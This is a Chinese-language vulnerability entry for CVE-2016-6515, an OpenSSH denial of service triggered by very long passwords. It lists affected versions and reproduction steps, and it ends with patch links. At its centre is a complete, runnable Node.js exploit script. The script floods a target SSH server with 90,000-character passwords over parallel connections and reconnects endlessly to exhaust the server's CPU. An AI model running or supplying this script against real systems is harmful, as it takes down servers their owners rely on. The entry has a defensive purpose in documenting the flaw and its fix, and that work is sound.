3.9.1 cve-2016-6515

漏洞名称

OpenSSH auth_password函数拒绝服务漏洞(cve-2016-6515)

漏洞等级

高危

漏洞描述:

Before 7.3 OpenSSH does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string. This bug resides in auth-passwd.c in auth_password function. Attackers can exploit this issue to cause the application to enter an infinite loop and consume excessive CPU resources, resulting in denial-of-service conditions. 大致意思: OpenSSH 7.3之前版本,sshd/auth-passwd.c/auth_password函数未限制密码验证中的密码长度,远程攻击者通过较长的字符串,利用此漏洞可造成拒绝服务

漏洞影响:

  • Ubuntu 16.04 LTS (If running 7.2)

  • OpenSSH OpenSSH 7.2p2

  • OpenSSH OpenSSH 7.2

  • IBM Vios 2.2.1 4

  • IBM Vios 2.2

  • IBM Vios 2.2.4.0

  • IBM Vios 2.2.3.50

  • IBM Vios 2.2.2.5

  • IBM Vios 2.2.2.0

  • IBM Vios 2.2.1.3

  • IBM Vios 2.2.1.1

  • IBM Vios 2.2.0.13

  • IBM Vios 2.2.0.11

  • IBM OpenSSH for GPFS 3.5

  • IBM Aix 7.2

  • IBM AIX 7.1

  • IBM AIX 6.1

  • IBM AIX 5.3

  • Openssh < 7.3

漏洞复现:

debian食用方法(不同环境依赖可能不同):

zhzy@debian:~$ apt-get install
zhzy@debian:~$ npm install ssh2
zhzy@debian:~$ npm install commander
zhzy@debian:~$ ./exploit.js -h HOST -p PORT -u USER

左侧vm为测试对象,右侧terminal为攻击方,下图为执行前,vm中ubuntu的top信息。

执行后可以看到vm中ubuntu的cpu使用率急速提升。

下载链接:cve-2016-6515.zip

#!/usr/bin/env node
/*
* CVE-2016-6515 exploit by opsxcq
*/
var Client = require('ssh2').Client;
var program = require('commander');
function usage(){
console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}
var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
buffer = buffer + pattern;
}
function exploit(host, port, user){
var conn = new Client();
conn//
.on('end', function() {
// Again
exploit(host, port, user);
})//
.on('close', function(err) {
// Again
if(!err){
exploit(host, port, user);
}
})//
.on('error', function(){
exploit(host, port, user);
}) //
.connect({
host: host,
port: port,
username: user,
password: buffer
});
}
program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);
if (!program.port){
usage();
return -1;
}
if (!program.user){
usage();
return -1;
}
if (!program.host){
usage();
return -1;
}
var instances = 20;
if(program.instances){
instances = program.instances;
}
try{
console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
for(var i=0; i < instances; i++){
exploit(program.host, program.port, program.user);
}
}catch(e){
console.log("[-] Exception: "+e);
}

修复建议:

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://openwall.com/lists/oss-security/2016/08/01/2 https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97 或将openssh升级到v7.3版本以上(查看openssh版本:ssh -V